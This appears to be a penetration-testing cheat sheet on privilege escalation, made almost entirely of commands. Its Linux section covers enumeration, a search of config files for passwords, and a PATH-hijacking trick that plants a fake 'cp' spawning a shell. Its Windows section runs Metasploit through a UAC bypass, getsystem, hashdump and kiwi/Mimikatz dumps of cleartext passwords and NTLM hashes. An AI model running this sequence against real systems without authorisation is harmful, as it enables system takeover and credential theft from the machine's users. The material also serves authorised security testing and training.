Privilege Escalation

Privilege Escalation

Manual Linux Privilege Escalation

# Check Current User and Groups
whoami && id && groups

# Check sudo Permissions
sudo -l

# SUID Binaries
find / -perm -4000 -type f 2>/dev/null

# Check Procesess
ps aux

# Writable Cron Jobs
cat /etc/crontab
ls -l /etc/cron.*/*

# PATH Hijacking
echo -e '#!/bin/bash\nbash -i' > /tmp/cp
chmod +x /tmp/cp
export PATH=/tmp:$PATH

# Search Config Files and Credentials
find / -name "*.conf" 2>/dev/null
grep -i "pass" /etc/*.conf

# Kernel Exploit (Last Resource)
uname -a
searchsploit linux kernel <version>

Metasploit Windows Privilege Escalation

# Background meterpreter session
background

# Suggest local exploits
use post/multi/recon/local_exploit_suggester
set SESSION <ID>
run

# UAC Bypass (if user is not fully admin due to UAC)
use exploit/windows/local/bypassuac
set SESSION <ID>
run

# Attempt privilege escalation
getsystem

# Migrate to a more stable or privileged process
ps
migrate <PID>

# Dump hashes (requires SYSTEM privileges)
hashdump

# Load Mimikatz-like functionality (kiwi)
load kiwi

# Extract plaintext creds, hashes, tokens, etc.
creds_all

# View cleartext credentials from memory
kiwi_cmd sekurlsa::logonpasswords

# View NTLM hashes (if available)
kiwi_cmd sekurlsa::msv

Last updated